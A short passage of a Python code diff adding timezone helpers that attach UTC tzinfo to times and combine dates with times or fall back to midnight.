+ return TimeTz(t.replace(tzinfo=timezone.utc))
+
+
+def combine_ensure_tzinfo(d: date, t: time) -> DateTimeTz:
+ return safe_combine(d, ensure_tzinfo(t))
+
+
+def combine_or_midnight(d: date, t: Optional[time]) -> DateTimeTz:
+ if t is not None:
+ return combine_ensure_tzinfo(d, t)
+ return with_min_time(d)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.